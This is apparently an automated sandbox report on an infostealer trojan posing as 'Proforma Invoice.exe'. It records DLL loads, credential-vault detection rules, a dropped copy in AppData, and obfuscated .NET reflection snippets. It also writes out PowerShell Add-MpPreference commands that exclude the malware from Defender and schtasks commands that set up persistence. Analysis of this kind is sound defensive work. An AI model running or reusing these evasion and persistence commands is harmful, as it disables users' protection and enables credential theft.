Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Section loaded: edputil.dll

Source: Proforma Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: Proforma Invoice.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VoAlKljQu.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, UyDMxsd3t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, 86A7K.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, vztq.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, B80ITW1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, uQSn7t.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'

Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@2/2

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Mutant created: \Sessions\1\BaseNamedObjects\TzoYpGstWoYJF

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp

Jump to behavior

Source: Proforma Invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Proforma Invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Proforma Invoice.exe	ReversingLabs: Detection: 63%
Source: Proforma Invoice.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File read: C:\Users\user\Desktop\Proforma Invoice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Proforma Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Proforma Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, fJ.cs	.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

